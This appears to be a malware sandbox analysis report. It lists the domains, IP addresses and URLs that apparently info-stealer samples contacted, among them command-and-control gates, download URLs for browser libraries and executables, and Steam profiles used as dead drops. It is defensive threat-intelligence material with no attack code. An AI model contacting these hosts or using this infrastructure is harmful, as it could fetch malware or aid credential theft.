                            http://www.entrust.net/rpa030%URL Reputationsafe
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                            https://lv.queniujq.cn0%URL Reputationsafe
                            https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                            https://checkout.steampowered.com/0%URL Reputationsafe
                            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%URL Reputationsafe
                            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%URL Reputationsafe
                            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
                            https://help.steampowered.com/en/0%URL Reputationsafe
                            https://community.akamai.steamstatic.com/0%URL Reputationsafe
                            https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                            https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
                            http://46.8.231.109/100%URL Reputationmalware
                            http://46.8.231.109/1309cdeb8f4c8736/nss3.dll100%URL Reputationmalware
                            http://crl.entrust.net/ts1ca.crl00%URL Reputationsafe
                            https://login.steampowered.com/0%URL Reputationsafe
                            https://store.steampowered.com/legal/0%URL Reputationsafe
                            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            treatynreit.site
                            		172.67.184.196
                            		truetrue
                              		unknown
                              mysterisop.site
                              		172.67.195.67
                              		truetrue
                                		unknown
                                cowod.hopto.org
                                		45.132.206.251
                                		truetrue
                                  		unknown
                                  iplogger.org
                                  		104.26.3.46
                                  		truefalse
                                    		unknown
                                    api64.ipify.org
                                    		173.231.16.77
                                    		truefalse
                                      		unknown
                                      snarlypagowo.site
                                      		104.21.18.193
                                      		truetrue
                                        		unknown
                                        steamcommunity.com
                                        		104.102.49.254
                                        		truetrue
                                          		unknown
                                          questionsmw.store
                                          		172.67.208.141
                                          		truetrue
                                            		unknown
                                            absorptioniw.site
                                            		104.21.17.174
                                            		truetrue
                                              		unknown
                                              abnomalrkmu.site
                                              		104.21.56.150
                                              		truetrue
                                                		unknown
                                                gravvitywio.store
                                                		104.21.16.12
                                                		truetrue
                                                  		unknown
                                                  ipinfo.io
                                                  		34.117.59.81
                                                  		truefalse
                                                    		unknown
                                                    api.ipify.org
                                                    		104.26.12.205
                                                    		truefalse
                                                      		unknown
                                                      soldiefieop.site
                                                      		188.114.97.3
                                                      		truetrue
                                                        		unknown
                                                        yalubluseks.eu
                                                        		172.67.140.92
                                                        		truefalse
                                                          		unknown
                                                          chorusarorp.site
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            55.235.10.0.in-addr.arpa
                                                            		unknown
                                                            		unknownfalse
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              https://49.12.197.9/true
                                                                		unknown
                                                                https://abnomalrkmu.site/apitrue
                                                                  		unknown
                                                                  https://soldiefieop.site/apitrue
                                                                    		unknown
                                                                    https://49.12.197.9/sqlp.dlltrue
                                                                      		unknown
                                                                      https://49.12.197.9/softokn3.dlltrue
                                                                        		unknown
                                                                        http://46.8.231.109/1309cdeb8f4c8736/softokn3.dlltrue
                                                                        • URL Reputation: malware
                                                                        		unknown
                                                                        https://yalubluseks.eu/receive.phpfalse
                                                                          		unknown
                                                                          https://steamcommunity.com/profiles/76561199724331900true
                                                                          • URL Reputation: malware
                                                                          		unknown
                                                                          questionsmw.stortrue
                                                                            		unknown
                                                                            https://49.12.197.9/vcruntime140.dlltrue
                                                                              		unknown
                                                                              https://49.12.197.9/nss3.dlltrue
                                                                                		unknown
                                                                                https://api64.ipify.org/?format=jsonfalse
                                                                                  		unknown
                                                                                  https://steamcommunity.com/profiles/76561199780418869true
                                                                                    		unknown
                                                                                    http://46.8.231.109/true
                                                                                    • URL Reputation: malware
                                                                                    		unknown
                                                                                    http://46.8.231.109/1309cdeb8f4c8736/nss3.dlltrue
                                                                                    • URL Reputation: malware
                                                                                    		unknown
                                                                                    https://gravvitywio.store/apitrue
                                                                                      		unknown
                                                                                      snarlypagowo.sitetrue
                                                                                        		unknown
                                                                                        chorusarorp.sitetrue
                                                                                          		unknown

                                                                                          URLs from Memory and Binaries

                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                          https://steamcommunity.com/profiles/76561199780418869KRegAsm.exe, 00000014.00000002.3190699075.000000000165F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exerm-data;RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://duckduckgo.com/ac/?q=RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://cowod.hoptoFHJDBKJRegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://yalubluseks.euDLKMService.exe, 00000002.00000002.4578665236.0000000003323000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003671000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5fRegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://www.gstatic.cn/recaptcha/RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://49.12.197.9/datetiiRegAsm.exe, 00000014.00000002.3190699075.0000000001680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000014.00000002.3179432809.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe3RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&l=eRegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                        		unknown
                                                                                                        https://www.youtube.comRegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://46.8.231.109/c4754d4f680ead72.php&PRegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                            		unknown
                                                                                                            http://cowod.hopto.org_DEBUG.zip/cE4aR4O9hOTF5WJfvKNpcVCp8.exe, 0000000F.00000002.2354142791.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngRegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll6ARegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                		unknown
                                                                                                                http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeGRegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://49.12.197.9JJKFHCFB--RegAsm.exe, 0000002F.00000002.3443973307.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000014.00000002.3179432809.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000516000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0E4aR4O9hOTF5WJfvKNpcVCp8.exe, 0000000F.00000002.2354142791.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://49.12.197.9/softokn3.dllCRegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://s.ytimg.com;RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://46.8.231.109/1309cdeb8f4c8736/mozglue.dlltRegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                            		unknown
                                                                                                                            https://49.12.197.9/freebl3.dllTRegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLKMService.exe, 00000002.00000002.4578665236.0000000003199000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000027B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://46.8.231.109/1309cdeb8f4c8736/nss3.dllppDataRegAsm.exe, 00000013.00000002.2783474686.00000000014BD000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                		unknown
                                                                                                                                https://yalubluseks.eu/file.exe, 00000000.00000002.2124725712.0000000003035000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003199000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000003.00000002.4578530744.0000000002B7A000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000007.00000002.2292535537.00000000030D6000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2377496646.0000000003035000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2457008561.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000027B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://yalubluseks.euLKMService.exe, 00000002.00000002.4578665236.0000000003323000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003671000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003631000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://49.12.197.9/spRegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.entrust.net/rpa03userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiRegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://49.12.197.9EBAAKFRegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://lv.queniujq.cnRegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/RegAsm.exe, 00000027.00000002.2589625219.0000000001356000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                          • URL Reputation: malware
                                                                                                                                          		unknown
                                                                                                                                          https://www.youtube.com/RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.20.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://absorptioniw.site/apiJRegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://steamcommunity.com/profiles/76561199780418869lRegAsm.exe, 0000002F.00000002.3450965793.0000000001551000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://ipinfo.io/RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://soldiefieop.site/api4RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.google.com/recaptcha/RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://checkout.steampowered.com/RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishRegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://ipinfo.io/https://ipgeolocation.io/::f98ae5e6665140c7bc7a10ef5c598fcb.exe, 00000004.00000002.2206542664.0000000003B55000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://ac.ecopRegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://49.12.197.9KFHDAARegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://crl.entrust.net/2048ca.crl0userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://questionsmw.store/api_iRegAsm.exe, 00000027.00000002.2588002060.00000000012D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://ipinfo.io:443/widget/demo/8.46.123.33RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://49.12.197.9s.exeRegAsm.exe, 00000014.00000002.3179432809.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.00000000005A1000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://cowod.hopto.HJDBKJRegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishRegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://41.216.188.190:80/api/wp-ping.phpRegAsm.exe, 00000006.00000002.2325722695.000000000158D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://help.steampowered.com/en/RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://community.akamai.steamstatic.com/RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://iplogger.org/RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
